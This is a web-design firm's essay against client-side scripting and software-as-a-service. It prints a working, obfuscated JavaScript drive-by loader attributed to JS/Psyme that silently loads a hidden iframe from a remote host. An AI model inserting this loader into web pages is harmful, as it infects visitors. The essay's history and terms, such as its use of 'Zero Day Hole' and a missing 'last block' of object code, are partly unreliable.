A Brief History of Active/Dynamic Scripting
It's a Document Server, not an Application Server
Ever since the dawn of inter-computer communication, software manufacturers have dreamed of offering software as a service or SAAS. Just imagine the profitability if instead of paying US$500.oo for Microsoft Office, you paid US$100.oo per month to access it via the internet or even US$10.oo every single time you opened one of the Office Applications for use. The problem is that SAAS not only shares limited hardware and bandwidth resources amongst millions of users (making it very slow on even the fastest connections), but it also requires trust from those visitors who wish to use it.
Back in the 1970's, an operating system named Mod8 was given a peculiar feature. Master Mode as this feature was known, was the imperative to execute all succeeding characters as application code after encountering the control character that initiated Master mode. This would have allowed programs to initiate from within documents and images controlled on a centralised server making SAAS a realistic possibility more than three decades ago. The problem with this system is that it allowed a file that was expected to behave as a document to behave as an application without warning to the user. This created a very risky operating environment where even the most innocent file could hide a nasty surprise. Technicians at computer expos exploited this, and the feature was dropped.
In the 1990's, the mistakes of history were repeated with the proliferation of macros and Dynamic HTML based scripting that ran on the client computer and not on the server. First we endured a plague of macro viruses that successfully stripped away the innocence of all proprietary Microsoft formats except for RTF. Then after the world had come to trust web pages, a new plague of viruses exploiting the Zero Day Hole, as the "dynamic" or "active" client-side scripting became known. Many viruses depend on a script in the email to automatically launch the virus when the email is opened (unless the user has disallowed all client-side scripting). Likewise, phishing (the counterfeiting of bank websites to steal bank account and password details) is only possible if client-side scripts are allowed to do the dirty work of hiding the true location of the site.
The threat from the Zero-Day Hole as active scripting and dynamic scripting has become known is very real. According to statistics compiled by Grisoft, manufacturers of AVG Anti-Virus, one in every thousand web pages is infected with drive-by virus loaders. To reinforce just how real this threat is, displayed below is an example of source code for a drive-by loader for the JavaScript infection "JS/Psyme" which we took from an infected site. The site had been hacked because the hosting provider failed to set a PHP tag filter that excluded files and content from other domains. Psyme also has a VBScript variant and is propagated as simply as inserting code such as this into the web page source. If visitors do not have scripting (Java, VB, ActiveX, and .NET) turned off, it downloads and runs an embedded executable chosen by the offender.
<script>function v47016518c6af9(v47016518c7a9a)
{function v47016518c8a38 () {return 16;} return(parseInt(v47016518c7a9a,v47016518c8a38()));}
function v47016518ca9a8(v47016518cbc18){ function v47016518ce80a () {var v47016518cf7d1=2; return v47016518cf7d1;} var
v47016518cc8ce='';for(v47016518cd86d=0; v47016518cd86d<v47016518cbc18.length;
v47016518cd86d+=v47016518ce80a()){ v47016518cc8ce+=(String.fromCharCode(
v47016518c6af9(
v47016518cbc18.substr(
v47016518cd86d, v47016518ce80a()))));}return v47016518cc8ce;}
document.write(
v47016518ca9a8(
'3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F
63756D656E742E777269746528273C696672616D65206E616D653D312073726
33D5C27687474703A2F2F676F6F676C652D7374617469737469632E636F6D2F
696E2E6367693F323F272B4D6174682E726F756E64284D6174682E72616E646
F6D28292A3637373332292B2766333430623639655C272077696474683D3131
38206865696768743D353734207374796C653D5C27646973706C61793A206E6
F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
The drive-by web page loaded virus JS/Psyme. This virus or any other can be loaded with JavaScript as shown above or VBScript; and is a compelling reason for your visitors to have all scripting disabled in their browser.
The object code for that executable can be seen in the last block of code. Script based viruses such as this can also be spread via email because the email browser also executes client-side scripts such as this one unless the operating system is instructed not to do so. This trojan horse virus is one reason why any savvy visitors to your site will have Java and other active scripting turned off.
This century, still intent on profit at the expense of the community and of consumer confidence, some of the large software corporations are pushing the idea of SAAS by attempting to redefine the web server as an "Application Server". SAAS is a viable business option, provided it is run strictly server-side. However, the "Application Server" model is nothing more than an attempt to rename a very bad idea and hope that this will wash away the atrocious track record connected with allowing applications to masquerade as documents.
While RealmEleven develops both software packages and web pages, we only offer downloadable, quarantinable software under honest, permanent licensing arrangements; and we do not develop SAAS or anything that attempts to access a visitor's computer without the visitor's express consent. Instead, RealmEleven offer world class and high profile online document systems unmatched for clarity and functionality.
